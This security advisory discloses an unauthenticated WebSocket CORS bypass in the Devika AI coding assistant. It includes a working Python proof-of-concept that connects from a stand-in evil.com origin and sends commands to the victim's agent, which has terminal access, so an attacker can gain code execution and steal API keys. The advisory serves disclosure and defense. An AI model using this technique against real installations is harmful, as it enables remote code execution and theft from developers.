Advisory Details
Title: Unauthenticated WebSocket CORS Bypass Leads to Remote Code Execution via Agent Control
Description:
Summary
An incomplete CORS fix (CVE-2024-5549) in the Devika backend allows any unauthenticated attacker-controlled website to establish a WebSocket connection to a victim's local Devika instance. By bypassing CORS restrictions on the WebSocket interface, an attacker can silently command the victim's AI agent to execute arbitrary code or steal sensitive configurations, leading to Remote Code Execution (RCE).
Details
Devika is an AI coding assistant that uses a series of agents to generate software projects. While the developers successfully patched the HTTP REST API to restrict Cross-Origin Resource Sharing (CORS) to localhost:3000 (fixing CVE-2024-5549), the WebSocket server configuration was left unsecured.
In src/socket_instance.py, the Flask-SocketIO server is instantiated with the cors_allowed_origins="*" parameter:
socketio = SocketIO(cors_allowed_origins="*", async_mode="gevent")
Because WebSocket connections initiate via HTTP GET requests but are upgraded to the WebSocket protocol, this configuration instructs the backend to accept WebSocket handshakes from any Origin header. In a real-world scenario, if a developer is running Devika locally (listening on 127.0.0.1:1337) and visits any malicious website (http://evil.com), the JavaScript on that malicious site can establish a connection to ws://127.0.0.1:1337. Since the origin is ignored, the connection succeeds.
Once connected, the attacker has full access to the WebSocket API. They can emit a user-message event:
socket.emit("user-message", {
message: "Execute arbitrary commands...",
base_model: "GPT-4o",
project_name: "pwned",
});This directly invoking the underlying AI agent which has access to a live terminal_session. The agent will then execute the attacker's commands on the victim's system. Additionally, the attacker can silently read all incoming server-message events, which broadcast output from the agent, including API keys or local files if instructed to read them.
PoC
- Assume Devika is running locally on the default port (
http://127.0.0.1:1337).
- The attacker hosts the following Python script (
simple_ws_poc.py) to simulate a connection from a malicious origin, bypassing the browser constraints:
import socketio
import time
sio = socketio.Client()
@sio.event
def connect():
print("[+] Connected to Devika WebSocket API!")
print(f"[+] Session ID (sid): {sio.sid}")
print("[+] Sending malicious request to bypass CORS...")
sio.emit('user-message', {
'message': "Print 'Hello from external CORS bypass PoC'",
'project_name': 'cors_poc_test',
'base_model': 'GPT-4o'
})
time.sleep(2)
sio.disconnect()
try:
print("[*] Attempting cross-origin connection...")
sio.connect('http://127.0.0.1:1337', headers={'Origin': 'http://evil.com'})
sio.wait()
except Exception as e:
print(f"[-] Connection failed: {e}")
- Run the script:
python3 simple_ws_poc.py (requires python-socketio package).
- Observe the script output confirming the connection, and then check the Devika backend logs.
Log of Evidence
Output from the PoC script:
[*] Attempting cross-origin connection...
[+] Connected to Devika WebSocket API!
[+] Session ID (sid): 99WfTwMcHUsRpD9TAAAE
[+] Sending malicious request to bypass CORS...
Output from the Devika backend logs confirming the cross-origin websocket message was received and executed:
26.03.06 11:33:13: root: INFO : User message: {'message': "Print 'Hello from external CORS bypass PoC'", 'base_model': 'GPT-4o', 'project_name': 'cors_poc_test', 'search_engine': 'duckduckgo'}
[*] Agent thread started for project: cors-poc-test
[*] Agent created, executing...
Impact
Remote Code Execution. If a victim has Devika running locally and visits a manipulated web page or clicks a malicious link, an attacker can execute arbitrary OS commands on the victim's machine in the context of the user running Devika. They can also steal sensitive data such as source code, API keys, or project histories.
Affected products
- Ecosystem: python
- Package name: stitionai/devika
- Affected versions: All versions (e.g., latest
d6a096c main branch)
- Patched versions:
Severity
- Severity: High
- Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Weaknesses
- CWE: CWE-346: Origin Validation Error
Occurrences
Advisory Details
Title: Unauthenticated WebSocket CORS Bypass Leads to Remote Code Execution via Agent Control
Description:
Summary
An incomplete CORS fix (CVE-2024-5549) in the Devika backend allows any unauthenticated attacker-controlled website to establish a WebSocket connection to a victim's local Devika instance. By bypassing CORS restrictions on the WebSocket interface, an attacker can silently command the victim's AI agent to execute arbitrary code or steal sensitive configurations, leading to Remote Code Execution (RCE).
Details
Devika is an AI coding assistant that uses a series of agents to generate software projects. While the developers successfully patched the HTTP REST API to restrict Cross-Origin Resource Sharing (CORS) to
localhost:3000(fixing CVE-2024-5549), the WebSocket server configuration was left unsecured.In
src/socket_instance.py, theFlask-SocketIOserver is instantiated with thecors_allowed_origins="*"parameter:Because WebSocket connections initiate via HTTP GET requests but are upgraded to the WebSocket protocol, this configuration instructs the backend to accept WebSocket handshakes from any Origin header. In a real-world scenario, if a developer is running Devika locally (listening on
127.0.0.1:1337) and visits any malicious website (http://evil.com), the JavaScript on that malicious site can establish a connection tows://127.0.0.1:1337. Since the origin is ignored, the connection succeeds.Once connected, the attacker has full access to the WebSocket API. They can emit a
user-messageevent:This directly invoking the underlying AI agent which has access to a live
terminal_session. The agent will then execute the attacker's commands on the victim's system. Additionally, the attacker can silently read all incomingserver-messageevents, which broadcast output from the agent, including API keys or local files if instructed to read them.PoC
http://127.0.0.1:1337).simple_ws_poc.py) to simulate a connection from a malicious origin, bypassing the browser constraints:python3 simple_ws_poc.py(requirespython-socketiopackage).Log of Evidence
Output from the PoC script:
Output from the Devika backend logs confirming the cross-origin websocket message was received and executed:
Impact
Remote Code Execution. If a victim has Devika running locally and visits a manipulated web page or clicks a malicious link, an attacker can execute arbitrary OS commands on the victim's machine in the context of the user running Devika. They can also steal sensitive data such as source code, API keys, or project histories.
Affected products
d6a096cmain branch)Severity
Weaknesses
Occurrences
SocketIOserver withcors_allowed_origins="*"which explicitly accepts connections from any origin, bypassing HTTP CORS restrictions.